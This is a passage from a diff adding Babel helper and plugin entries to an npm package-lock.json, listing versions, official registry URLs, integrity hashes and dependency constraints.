"sha512-xZeCVVdwb4MsDBkkyZ64tReWYrLRHlMN72vP7Bdm3OUOuyFZExhsHUUnuWnm2/XOlAJzR0LfPpB56WXZn0X/lA==", + "dev": true, + "dependencies": { + "@babel/traverse": "^7.24.7", + "@babel/types": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-builder-react-jsx": { + "version": "7.22.10", + "resolved": "https://registry.npmjs.org/@babel/helper-builder-react-jsx/-/helper-builder-react-jsx-7.22.10.tgz", + "integrity": "sha512-cZr0nzCwrMp7Z8owt+YN8OncOqhG1eZLp/aRT5ftBnkLJTCB3Dnq/t52vSfWc6sGRWdDeawbksuh3pYQGCzVwA==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.22.5", + "@babel/types": "^7.22.10" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-compilation-targets": { + "version": "7.26.5", + "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.26.5.tgz", + "integrity": "sha512-IXuyn5EkouFJscIDuFF5EsiSolseme1s0CZB+QxVugqJLYmKdxI1VfIBOst0SUu4rnk2Z7kqTwmoO1lp3HIfnA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/compat-data": "^7.26.5", + "@babel/helper-validator-option": "^7.25.9", + "browserslist": "^4.24.0", + "lru-cache": "^5.1.1", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-create-class-features-plugin": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/helper-create-class-features-plugin/-/helper-create-class-features-plugin-7.25.0.tgz", + "integrity": "sha512-GYM6BxeQsETc9mnct+nIIpf63SAyzvyYN7UB/IlTyd+MBg06afFGp0mIeUqGyWgS2mxad6vqbMrHVlaL3m70sQ==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-member-expression-to-functions": "^7.24.8", + "@babel/helper-optimise-call-expression": "^7.24.7", + "@babel/helper-replace-supers": "^7.25.0", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7", + "@babel/traverse": "^7.25.0", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-create-regexp-features-plugin": { + "version": "7.25.2", + "resolved": "https://registry.npmjs.org/@babel/helper-create-regexp-features-plugin/-/helper-create-regexp-features-plugin-7.25.2.tgz", + "integrity": "sha512-+wqVGP+DFmqwFD3EH6TMTfUNeqDehV3E/dl+Sd54eaXqm17tEUNbEIn4sVivVowbvUpOtIGxdo3GoXyDH9N/9g==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "regexpu-core": "^5.3.1", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-define-polyfill-provider": { + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/@babel/helper-define-polyfill-provider/-/helper-define-polyfill-provider-0.6.2.tgz", + "integrity": "sha512-LV76g+C502biUK6AyZ3LK10vDpDyCzZnhZFXkH1L75zHPj68+qc8Zfpx2th+gzwA2MzyK+1g/3EPl62yFnVttQ==", + "dev": true, + "dependencies": { + "@babel/helper-compilation-targets": "^7.22.6", + "@babel/helper-plugin-utils": "^7.22.5", + "debug": "^4.1.1", + "lodash.debounce": "^4.0.8", + "resolve": "^1.14.2" + }, + "peerDependencies": { + "@babel/core": "^7.4.0 || ^8.0.0-0 <8.0.0" + } + }, + "node_modules/@babel/helper-member-expression-to-functions": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.24.8.tgz", + "integrity": "sha512-LABppdt+Lp/RlBxqrh4qgf1oEH/WxdzQNDJIu5gC/W1GyvPVrOBiItmmM8wan2fm4oYqFuFfkXmlGpLQhPY8CA==", + "dev": true, + "dependencies": { + "@babel/traverse": "^7.24.8", + "@babel/types": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-module-imports": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", + "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/traverse": "^7.25.9", + "@babel/types": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-module-transforms": { + "version": "7.26.0", + "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", + "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/helper-module-imports": "^7.25.9", + "@babel/helper-validator-identifier": "^7.25.9", + "@babel/traverse": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-optimise-call-expression": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.24.7.tgz", + "integrity": "sha512-jKiTsW2xmWwxT1ixIdfXUZp+P5yURx2suzLZr5Hi64rURpDYdMW0pv+Uf17EYk2Rd428Lx4tLsnjGJzYKDM/6A==", + "dev": true, + "dependencies": { + "@babel/types": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-plugin-utils": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", + "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", + "dev": true, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-remap-async-to-generator": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/helper-remap-async-to-generator/-/helper-remap-async-to-generator-7.25.0.tgz", + "integrity": "sha512-NhavI2eWEIz/H9dbrG0TuOicDhNexze43i5z7lEqwYm0WEZVTwnPpA0EafUTP7+6/W79HWIP2cTe3Z5NiSTVpw==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-wrap-function": "^7.25.0", + "@babel/traverse": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-replace-supers": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/helper-replace-supers/-/helper-replace-supers-7.25.0.tgz", + "integrity": "sha512-q688zIvQVYtZu+i2PsdIu/uWGRpfxzr5WESsfpShfZECkO+d2o+WROWezCi/Q6kJ0tfPa5+pUGUlfx2HhrA3Bg==", + "dev": true, + "dependencies": { + "@babel/helper-member-expression-to-functions": "^7.24.8", + "@babel/helper-optimise-call-expression": "^7.24.7", + "@babel/traverse": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-simple-access": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.24.7.tgz", + "integrity": "sha512-zBAIvbCMh5Ts+b86r/CjU+4XGYIs+R1j951gxI3KmmxBMhCg4oQMsv6ZXQ64XOm/cvzfU1FmoCyt6+owc5QMYg==", + "dev": true, + "dependencies": { + "@babel/traverse": "^7.24.7", + "@babel/types": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-skip-transparent-expression-wrappers": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/helper-skip-transparent-expression-wrappers/-/helper-skip-transparent-expression-wrappers-7.24.7.tgz", + "integrity": "sha512-IO+DLT3LQUElMbpzlatRASEyQtfhSE0+m465v++3jyyXeBTBUjtVZg28/gHeV5mrTJqvEKhKroBGAvhW+qPHiQ==", + "dev": true, + "dependencies": { + "@babel/traverse": "^7.24.7", + "@babel/types": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-string-parser": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", + "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-validator-identifier": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", + "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-validator-option": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", + "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", + "dev": true, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-wrap-function": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/helper-wrap-function/-/helper-wrap-function-7.25.0.tgz", + "integrity": "sha512-s6Q1ebqutSiZnEjaofc/UKDyC4SbzV5n5SrA2Gq8UawLycr3i04f1dX4OzoQVnexm6aOCh37SQNYlJ/8Ku+PMQ==", + "dev": true, + "dependencies": { + "@babel/template": "^7.25.0", + "@babel/traverse": "^7.25.0", + "@babel/types": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helpers": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.9.tgz", + "integrity": "sha512-Mz/4+y8udxBKdmzt/UjPACs4G3j5SshJJEFFKxlCGPydG4JAHXxjWjAwjd09tf6oINvl1VfMJo+nB7H2YKQ0dA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/template": "^7.26.9", + "@babel/types": "^7.26.9" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/highlight": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.24.7.tgz", + "integrity": "sha512-EStJpq4OuY8xYfhGVXngigBJRWxftKX9ksiGDnmlY3o7B/V7KIAc9X4oiK87uPJSc/vs5L869bem5fhZa8caZw==", + "dev": true, + "dependencies": { + "@babel/helper-validator-identifier": "^7.24.7", + "chalk": "^2.4.2", + "js-tokens": "^4.0.0", + "picocolors": "^1.0.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/parser": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.9.tgz", + "integrity": "sha512-81NWa1njQblgZbQHxWHpxxCzNsa3ZwvFqpUg7P+NNUU6f3UU2jBEg4OlF/J6rl8+PQGh1q6/zWScd001YwcA5A==", + "license": "MIT", + "dependencies": { + "@babel/types": "^7.26.9" + }, + "bin": { + "parser": "bin/babel-parser.js" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@babel/plugin-bugfix-firefox-class-in-computed-class-key": { + "version": "7.25.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-firefox-class-in-computed-class-key/-/plugin-bugfix-firefox-class-in-computed-class-key-7.25.3.tgz", + "integrity": "sha512-wUrcsxZg6rqBXG05HG1FPYgsP6EvwF4WpBbxIpWIIYnH8wG0gzx3yZY3dtEHas4sTAOGkbTsc9EGPxwff8lRoA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/traverse": "^7.25.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-bugfix-safari-class-field-initializer-scope": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-safari-class-field-initializer-scope/-/plugin-bugfix-safari-class-field-initializer-scope-7.25.0.tgz", + "integrity": "sha512-Bm4bH2qsX880b/3ziJ8KD711LT7z4u8CFudmjqle65AZj/HNUFhEf90dqYv6O86buWvSBmeQDjv0Tn2aF/bIBA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression/-/plugin-bugfix-safari-id-destructuring-collision-in-function-expression-7.25.0.tgz", + "integrity": "sha512-lXwdNZtTmeVOOFtwM/WDe7yg1PL8sYhRk/XH0FzbR2HDQ0xC+EnQ/JHeoMYSavtU115tnUk0q9CDyq8si+LMAA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining/-/plugin-bugfix-v8-spread-parameters-in-optional-chaining-7.24.7.tgz", + "integrity": "sha512-+izXIbke1T33mY4MSNnrqhPXDz01WYhEf3yF5NbnUtkiNnm+XBZJl3kNfoK6NKmYlz/D07+l2GWVK/QfDkNCuQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7", + "@babel/plugin-transform-optional-chaining": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.13.0" + } + }, + "node_modules/@babel/plugin-bugfix-v8-static-class-fields-redefine-readonly": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-v8-static-class-fields-redefine-readonly/-/plugin-bugfix-v8-static-class-fields-redefine-readonly-7.25.0.tgz", + "integrity": "sha512-tggFrk1AIShG/RUQbEwt2Tr/E+ObkfwrPjR6BjbRvsx24+PSjK8zrq0GWPNCjo8qpRx4DuJzlcvWJqlm+0h3kw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/traverse": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-proposal-class-properties": { + "version": "7.18.6", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-class-properties/-/plugin-proposal-class-properties-7.18.6.tgz", + "integrity": "sha512-cumfXOF0+nzZrrN8Rf0t7M+tF6sZc7vhQwYQck9q1/5w2OExlD+b4v4RpMJFaV1Z7WcDRgO6FqvxqxGlwo+RHQ==", + "deprecated": "This proposal has been merged to the ECMAScript standard and thus this plugin is no longer maintained. Please use @babel/plugin-transform-class-properties instead.", + "dev": true, + "dependencies": { + "@babel/helper-create-class-features-plugin": "^7.18.6", + "@babel/helper-plugin-utils": "^7.18.6" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-proposal-object-rest-spread": { + "version": "7.20.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-object-rest-spread/-/plugin-proposal-object-rest-spread-7.20.7.tgz", + "integrity": "sha512-d2S98yCiLxDVmBmE8UjGcfPvNEUbA1U5q5WxaWFUGRzJSVAZqm5W6MbPct0jxnegUZ0niLeNX+IOzEs7wYg9Dg==", + "deprecated": "This proposal has been merged to the ECMAScript standard and thus this plugin is no longer maintained. Please use @babel/plugin-transform-object-rest-spread instead.", + "dev": true, + "dependencies": { + "@babel/compat-data": "^7.20.5", + "@babel/helper-compilation-targets": "^7.20.7", + "@babel/helper-plugin-utils": "^7.20.2", + "@babel/plugin-syntax-object-rest-spread": "^7.8.3", + "@babel/plugin-transform-parameters": "^7.20.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-proposal-private-property-in-object": { + "version": "7.21.0-placeholder-for-preset-env.2", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-private-property-in-object/-/plugin-proposal-private-property-in-object-7.21.0-placeholder-for-preset-env.2.tgz", + "integrity": "sha512-SOSkfJDddaM7mak6cPEpswyTRnuRltl429hMraQEglW+OkovnCzsiszTmsrlY//qLFjCpQDFRvjdm2wA5pPm9w==", + "dev": true, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-async-generators": { + "version": "7.8.4", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", + "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-class-properties": { + "version": "7.12.13", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", + "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.12.13" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-class-static-block": { + "version": "7.14.5", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-static-block/-/plugin-syntax-class-static-block-7.14.5.tgz", + "integrity": "sha512-b+YyPmr6ldyNnM6sqYeMWE+bgJcJpO6yS4QD7ymxgH34GBPNDM/THBh8iunyvKIZztiwLH4CJZ0RxTk9emgpjw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.14.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-dynamic-import": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-dynamic-import/-/plugin-syntax-dynamic-import-7.8.3.tgz", + "integrity": "sha512-5gdGbFon+PszYzqs83S3E5mpi7/y/8M9eC90MRTZfduQOYW76ig6SOSPNe41IG5LoP3FGBn2N0RjVDSQiS94kQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-export-namespace-from": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-export-namespace-from/-/plugin-syntax-export-namespace-from-7.8.3.tgz", + "integrity": "sha512-MXf5laXo6c1IbEbegDmzGPwGNTsHZmEy6QGznu5Sh2UCWvueywb2ee+CCE4zQiZstxU9BMoQO9i6zUFSY0Kj0Q==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.3" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-flow": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-flow/-/plugin-syntax-flow-7.25.9.tgz", + "integrity": "sha512-F3FVgxwamIRS3+kfjNaPARX0DSAiH1exrQUVajXiR34hkdA9eyK+8rJbnu55DQjKL/ayuXqjNr2HDXwBEMEtFQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-import-assertions": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-assertions/-/plugin-syntax-import-assertions-7.24.7.tgz", + "integrity": "sha512-Ec3NRUMoi8gskrkBe3fNmEQfxDvY8bgfQpz6jlk/41kX9eUjvpyqWU7PBP/pLAvMaSQjbMNKJmvX57jP+M6bPg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-import-attributes": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.24.7.tgz", + "integrity": "sha512-hbX+lKKeUMGihnK8nvKqmXBInriT3GVjzXKFriV3YC6APGxMbP8RZNFwy91+hocLXq90Mta+HshoB31802bb8A==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-import-meta": { + "version": "7.10.4", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", + "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.10.4" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-json-strings": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", + "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-jsx": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.24.7.tgz", + "integrity": "sha512-6ddciUPe/mpMnOKv/U+RSd2vvVy+Yw/JfBB0ZHYjEZt9NLHmCUylNYlsbqCCS1Bffjlb0fCwC9Vqz+sBz6PsiQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-logical-assignment-operators": { + "version": "7.10.4", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", + "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.10.4" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", + "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-numeric-separator": { + "version": "7.10.4", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", + "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.10.4" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-object-rest-spread": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", + "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-optional-catch-binding": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", + "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-optional-chaining": { + "version": "7.8.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", + "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.8.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-private-property-in-object": { + "version": "7.14.5", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-private-property-in-object/-/plugin-syntax-private-property-in-object-7.14.5.tgz", + "integrity": "sha512-0wVnp9dxJ72ZUJDV27ZfbSj6iHLoytYZmh3rFcxNnvsJF3ktkzLDZPy/mA17HGsaQT3/DQsWYX1f1QGWkCoVUg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.14.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-top-level-await": { + "version": "7.14.5", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", + "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.14.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-typescript": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.24.7.tgz", + "integrity": "sha512-c/+fVeJBB0FeKsFvwytYiUD+LBvhHjGSI0g446PRGdSVGZLRNArBUno2PETbAly3tpiNAQR5XaZ+JslxkotsbA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-syntax-unicode-sets-regex": { + "version": "7.18.6", + "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-unicode-sets-regex/-/plugin-syntax-unicode-sets-regex-7.18.6.tgz", + "integrity": "sha512-727YkEAPwSIQTv5im8QHz3upqp92JTWhidIC81Tdx4VJYIte/VndKf1qKrfnnhPLiPghStWfvC/iFaMCQu7Nqg==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.18.6", + "@babel/helper-plugin-utils": "^7.18.6" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-transform-arrow-functions": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-arrow-functions/-/plugin-transform-arrow-functions-7.24.7.tgz", + "integrity": 